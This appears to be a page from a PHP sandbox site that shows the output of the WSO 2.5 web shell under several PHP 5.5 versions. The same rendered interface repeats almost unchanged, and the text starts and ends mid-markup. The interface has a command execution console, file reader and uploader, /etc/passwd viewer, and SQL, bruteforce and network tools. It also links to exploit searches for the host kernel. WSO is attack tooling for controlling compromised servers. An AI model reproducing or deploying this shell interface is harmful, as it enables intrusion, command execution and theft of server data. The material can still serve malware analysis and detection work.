(req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.22 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.21
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.21 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.20
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.20 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.19
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.19 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.18
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody 